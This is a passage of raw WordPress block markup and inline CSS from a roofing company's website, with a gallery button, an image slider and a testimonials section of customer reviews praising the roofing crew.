skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"VIEW ALL WORKS\",\"link\":\"https://dunriteroof.com/gallery\",\"counterId\":\"47168312-0ca1-4133-bab7-40d5c2e35f72\",\"vPadding\":17,\"hPadding\":35,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"#0d2e63\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#ffffff\",\"buttonFontWeight\":\"700\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px !important; margin-bottom: 10px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 17px; padding-bottom: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: #0d2e63; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 700; line-height: undefined; opacity: 1; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #ffffff; }\n</style><style type=\"text/css\"> .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/gallery\" rel=\"noopener noreferrer\" target=\"_blank\">VIEW ALL WORKS</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":66,\"leftPadding\":120,\"leftPaddingTablet\":50,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938\"} -->\n<style type=\"text/css\"> .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 120px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938\" style=\"width:66%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":450,\"autoPlay\":true,\"autoPlaySpeed\":\"2000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#ffffff\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"f3bc0552-a5a5-4575-aa4d-c19791bc625e\"} -->\n<style type=\"text/css\"> .block-id-f3bc0552-a5a5-4575-aa4d-c19791bc625e .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-f3bc0552-a5a5-4575-aa4d-c19791bc625e .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-f3bc0552-a5a5-4575-aa4d-c19791bc625e .skt-blocks-gallery--item figure {\n height: 430px; }\n</style><div class=\"\"><div class=\"block-id-f3bc0552-a5a5-4575-aa4d-c19791bc625e is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:450px\" data-flickity=\"{&quot;autoPlay&quot;:2000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"4ef232e7-4452-4f40-9949-fe0d82ccff32\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-4\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-4 skt-blocks-block-section-outer-wrap block-4ef232e7-4452-4f40-9949-fe0d82ccff32 background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"7fb2dcec-224f-4765-8762-daef2cd5aa1c\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":32,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-7fb2dcec-224f-4765-8762-daef2cd5aa1c\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Testimonials</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Read Our Clients<br>Latest Reviews</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/testimonial-slider {\"classMigrate\":true,\"test_block\":[{\"description\":\"Justin and his crew did an amazing roofing job and even fixed my kitchen ceiling for me!!! Very professional and evening. I highly recommend them!!\",\"name\":\"John Doe \",\"company\":\"Happy Customer\",\"image\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8f05029117\",\"delete\":\"a8ff1c4035\",\"edit\":\"ee60ba071d\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"We are completely happy with the roofing job that Justin and his crew just finished. They were courteous and competent doing everything that I asked and more. The cost was very reasonable. \",\"name\":\"RIck \\u0026amp; Peggy \",\"company\":\"Happy Customer\",\"image\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8c7518bbdc\",\"delete\":\"de8f66528c\",\"edit\":\"99bb75a0ef\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"I highly recommend Dunrite Roofing. They did a great job on my complete roof tear-off and replacement. If you\'re looking for a low-slope roofing specialist give Mike a call..\",\"name\":\"Mike\",\"company\":\"Happy Customer\",\"image\":{\"id\":16,\"title\":\"blog-img\",\"filename\":\"blog-img.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/blog-img/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"blog-img\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:32.000Z\",\"modified\":\"2021-05-25T13:48:32.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"25f63e1ba1\",\"delete\":\"1ea75ab2d2\",\"edit\":\"f534b4e6c3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=16u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":53731,\"filesizeHumanReadable\":\"52 KB\",\"context\":\"\",\"height\":400,\"width\":560,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\",\"orientation\":\"landscape\"},\"medium\":{\"height\":214,\"width\":300,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-300x214.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"height\":400,\"width\":560,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}}],\"descColor\":\"#494848\",\"companyColor\":\"#303030\",\"authorColor\":\"#303030\",\"imagePosition\":\"left\",\"nameFontSize\":21,\"nameFontFamily\":\"Poppins\",\"nameFontWeight\":\"600\",\"companyFontSize\":16,\"companyFontFamily\":\"Poppins\",\"companyFontWeight\":\"400\",\"descFontSize\":16,\"descFontFamily\":\"Poppins\",\"descFontWeight\":\"400\",\"nameSpace\":10,\"descSpace\":20,\"block_id\":\"be53c5bc\",\"imgVrPadding\":5,\"imgHrPadding\":20,\"columns\":2,\"transitionSpeed\":1000,\"autoplaySpeed\":5000,\"arrowDots\":\"dots\",\"rowGap\":20,\"columnGap\":25,\"contentPadding\":30,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\",\"arrowColor\":\"#fe8333\"} -->\n<style type=\"text/css\"> .skt-blocks-slick-carousel.skt-blocks-block-be53c5bc button.slick-arrow {\n border-width: 1px; border-radius: 0px; border-color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-be53c5bc ul.slick-dots li button:before, ul.slick-dots li.slick-active button:before {\n color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-be53c5bc .slick-arrow svg {\n fill: #fe8333; height: 20px; width: 20px; }\n .skt-blocks-tm__image img{\n width: 60px; max-width: 60px; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-color .skt-blocks-tm__content{\n background-color: #ffffff; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__content{\n background-image: url(null); background-position: center center; background-repeat: no-repeat; background-size: cover; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__overlay{\n background-color: undefined; opacity: 0.5; }\n .skt-blocks-testimonial__wrap {\n padding-left: 12.5px; padding-right: 12.5px; margin-bottom: 20px; }\n .skt-blocks-testimonial__wrap .skt-blocks-tm__image-content {\n padding-left: 20px; padding-right: 20px; padding-top: 5px; padding-bottom: 5px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-tm__desc {\n padding: 20px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap:before {\n border-top: 10px solid center; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap {\n background-color: center; border-radius: 0px; }\n</style><div class=\"skt-blocks-testomonial__outer-wrap skt-blocks-slick-carousel skt-blocks-tm__arrow-outside skt-blocks-block-be53c5bc\"><div class=\"is-carousel skt-blocks-tm__columns-2 skt-blocks-tm__items responsive-testimonial-slick-carousel skt-blocks-block-be53c5bc\"><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">Justin and his crew did an amazing roofing job and even fixed my kitchen ceiling for me!!! Very professional and evening. I highly recommend them!!</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">John 